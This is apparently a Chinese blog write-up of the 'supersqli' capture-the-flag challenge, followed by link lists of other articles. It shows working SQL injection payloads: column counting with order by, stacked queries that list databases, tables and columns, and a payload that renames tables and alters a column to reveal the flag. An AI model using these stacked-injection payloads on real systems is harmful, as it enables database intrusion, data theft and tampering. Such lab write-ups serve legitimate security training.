题目链接

题目链接-supersqli

FUZZ测试

fuzz出,order by测出数据库查询列数2列,注释符号#,select|update|delete|drop|insert|where|被过滤,尝试堆叠注入

1’



1'order by 2 #



1'order by 3 #

堆叠注入

1';show databases;#

1';show tables;#

1';show columns from  words;#







测试判断数据库查询语句为

select * from words where id=$_inject;

页面显示的‘haha’为数据库表中id=1的值,现在可以将存有flag值的表名称改为words,并将列名flag改为id,查询语句如下,最后用or 1=1# 查出flag

1';rename tables `words` to `words1`;rename tables `1919810931114514` to `words`;alter table `words` change `flag` `id` varchar(100);#

1'or 1=1#

最新文章

  1. HDU 5102 The K-th Distance(模拟)
  2. Linux内核创建一个新进程
  3. C#学习系列-类与结构的区别
  4. 报错:LINQ to Entities 不识别方法
  5. NBOJv2 1034 Salary Inequity(DFS序+线段树区间更新区间(最值)查询)
  6. EditText图文混排
  7. [ActionScript 3.0] AS3 绘制正四面体(线条)
  8. Ubuntu 下一个可用的音乐播放器
  9. 【风马一族_Android】Android 从命令行界面获取手机信息
  10. 【MSP是什么】MSP认证之项目群管理
  11. CSS3 美女动画相框
  12. 使用angular-ui-router替代ng-router
  13. XSS DOM 测试
  14. com.mysql.cj.core.exceptions.InvalidConnectionAttributeException: The server time zone value '��� mysql-installer-community-8.0.15.0
  15. 【mysql】mysql常用语句
  16. 搭建WordPress 个人博客
  17. @ModelAttribute注解(SpringMVC)
  18. react-native组件封装与传值
  19. 20170918-00-(代理ip检验)
  20. 常用的 Windows 键

热门文章

  1. javaSE、javaEE、Android知识点总结
  2. 如何配置网络,使内网和WiFi同时使用
  3. 进程相关的API函数
  4. JUC---11单例模式
  5. 专题二:redis的数据类型之string
  6. git提交后文件夹显示灰色无法打开的解决办法
  7. [Luogu P1006]传纸条 (网格DP)
  8. Python3网络学习案例四:编写Web Proxy
  9. 849. Maximize Distance to Closest Person ——weekly contest 87
  10. 寻找性能更优秀的动态 Getter 和 Setter 方案